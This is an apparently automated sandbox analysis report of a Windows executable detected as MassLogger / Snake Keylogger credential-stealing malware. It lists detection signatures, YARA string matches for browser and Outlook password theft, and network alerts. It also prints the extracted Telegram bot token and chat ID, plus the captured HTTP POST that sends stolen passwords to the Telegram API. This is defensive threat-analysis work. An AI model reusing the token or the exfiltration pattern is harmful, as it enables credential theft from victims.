Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z87sammylastborn.exe

Overview

General Information

Sample name:z87sammylastborn.exe
Analysis ID:1588302
MD5:a5211c64910b02b059f301b05de54b16
SHA1:1f1ee1f8602bdc6400bc0290b1428e9f0362d4e9
SHA256:93b30930ca258fb9815309b89e3e5941d072832ab728a7af042f9c8d79a72d22
Tags:exeuser-Porcupine
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z87sammylastborn.exe (PID: 5656 cmdline: "C:\Users\user\Desktop\z87sammylastborn.exe" MD5: A5211C64910B02B059F301B05DE54B16)
    • RegAsm.exe (PID: 2276 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4", "Telegram Chatid": "6790572687"}
SourceRuleDescriptionAuthorStrings
00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0xefb7:$a1: get_encryptedPassword
        • 0xf2df:$a2: get_encryptedUsername
        • 0xed52:$a3: get_timePasswordChanged
        • 0xee73:$a4: get_passwordField
        • 0xefcd:$a5: set_encryptedPassword
        • 0x10929:$a7: get_logins
        • 0x105da:$a8: GetOutlookPasswords
        • 0x103cc:$a9: StartKeylogger
        • 0x10879:$a10: KeyLoggerEventArgs
        • 0x10429:$a11: KeyLoggerEventArgsEventHandler
        00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          0.2.z87sammylastborn.exe.3b3e220.2.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            0.2.z87sammylastborn.exe.3b3e220.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.z87sammylastborn.exe.3b3e220.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.z87sammylastborn.exe.3b3e220.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0xd3b7:$a1: get_encryptedPassword
                • 0xd6df:$a2: get_encryptedUsername
                • 0xd152:$a3: get_timePasswordChanged
                • 0xd273:$a4: get_passwordField
                • 0xd3cd:$a5: set_encryptedPassword
                • 0xed29:$a7: get_logins
                • 0xe9da:$a8: GetOutlookPasswords
                • 0xe7cc:$a9: StartKeylogger
                • 0xec79:$a10: KeyLoggerEventArgs
                • 0xe829:$a11: KeyLoggerEventArgsEventHandler
                0.2.z87sammylastborn.exe.3b3e220.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x12363:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x11861:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x11b6f:$a4: \Orbitum\User Data\Default\Login Data
                • 0x12967:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 20 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:44:40.124585+010020577441Malware Command and Control Activity Detected192.168.2.549711149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:44:32.994323+010028032742Potentially Bad Traffic192.168.2.549706132.226.247.7380TCP
                2025-01-10T23:44:39.242851+010028032742Potentially Bad Traffic192.168.2.549706132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-10T23:44:39.863580+010018100081Potentially Bad Traffic192.168.2.549711149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: z87sammylastborn.exeAvira: detected
                Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4", "Telegram Chatid": "6790572687"}
                Source: RegAsm.exe.2276.3.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendMessage"}
                Source: z87sammylastborn.exeVirustotal: Detection: 50%Perma Link
                Source: z87sammylastborn.exeReversingLabs: Detection: 76%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: z87sammylastborn.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: z87sammylastborn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
                Source: z87sammylastborn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: z87sammylastborn.exe, 00000000.00000002.2084385512.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 4x nop then jmp 05078536h0_2_05078358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 02A45782h3_2_02A45358
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 02A451B9h3_2_02A44F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 02A45782h3_2_02A456AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D1935h3_2_050D15F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DC7D8h3_2_050DC530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D0FF1h3_2_050D0D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DF028h3_2_050DED80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DD088h3_2_050DCDE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DDEC8h3_2_050DDC20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D3EF8h3_2_050D3C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DBF28h3_2_050DBC80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D0741h3_2_050D0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DE778h3_2_050DE4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D31F0h3_2_050D2F48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DB220h3_2_050DAF78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D3AA0h3_2_050D37F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DA0C0h3_2_050D9E18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DF8D8h3_2_050DF630
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DD93Ah3_2_050DD690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DA970h3_2_050DA6C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DEBD0h3_2_050DE928
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DCC30h3_2_050DC988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D1449h3_2_050D11A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DF480h3_2_050DF1D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DBAD0h3_2_050DB828
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D02E9h3_2_050D0040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DE320h3_2_050DE078
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D4350h3_2_050D40A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DC380h3_2_050DC0D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D0B99h3_2_050D08F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DADC8h3_2_050DAB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D3648h3_2_050D33A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DB678h3_2_050DB3D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DD4E0h3_2_050DD238
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DA518h3_2_050DA270
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050DFD30h3_2_050DFA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 050D2D98h3_2_050D2AF0

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49711 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49711 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.5:63598 -> 162.159.36.2:53
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319e7496d93bHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 132.226.247.73:80
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49707 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: unknownHTTP traffic detected: POST /bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790572687&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319e7496d93bHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.orgd
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
                Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002C46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7808791546:AAHW1HtuPv5PTKyABxs64lTNvFxWfoJO5x4/sendDocument?chat_id=6790
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: z87sammylastborn.exe, 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
                Source: RegAsm.exe, 00000003.00000002.4534096761.0000000002B70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.z87sammylastborn.exe.3b3e220.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.z87sammylastborn.exe.3afd1b0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.z87sammylastborn.exe.3ad3380.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000003.00000002.4532886136.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2084553409.0000000003AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: z87sammylastborn.exe PID: 5656, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegAsm.exe PID: 2276, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_00CAE0840_2_00CAE084
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_04FA01300_2_04FA0130
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_04FA01200_2_04FA0120
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_0507A6A00_2_0507A6A0
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_050783580_2_05078358
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_05078E580_2_05078E58
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_0507C8F00_2_0507C8F0
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_0507A6910_2_0507A691
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_050783480_2_05078348
                Source: C:\Users\user\Desktop\z87sammylastborn.exeCode function: 0_2_06C516480_2_06C51648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A4C1683_2_02A4C168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A4CAB03_2_02A4CAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A47E683_2_02A47E68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A44F083_2_02A44F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A42DD13_2_02A42DD1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A4CAAF3_2_02A4CAAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A4B9E03_2_02A4B9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A4B9DC3_2_02A4B9DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A44EF83_2_02A44EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_02A47E673_2_02A47E67
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D45003_2_050D4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D15F83_2_050D15F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D1C583_2_050D1C58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D77703_2_050D7770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D69983_2_050D6998
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DC5223_2_050DC522
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D0D393_2_050D0D39
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DC5303_2_050DC530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D0D483_2_050D0D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DED703_2_050DED70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DED803_2_050DED80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DCDD23_2_050DCDD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D15EA3_2_050D15EA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DCDE03_2_050DCDE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DDC123_2_050DDC12
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D1C293_2_050D1C29
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DDC203_2_050DDC20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D3C413_2_050D3C41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D3C503_2_050D3C50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DBC713_2_050DBC71
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D04893_2_050D0489
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DBC803_2_050DBC80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D04983_2_050D0498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D9C903_2_050D9C90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DE4C03_2_050DE4C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DE4D03_2_050DE4D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D2F383_2_050D2F38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D2F483_2_050D2F48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DAF683_2_050DAF68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050DAF783_2_050DAF78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D37E83_2_050D37E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_050D37F83_2_050D37F8
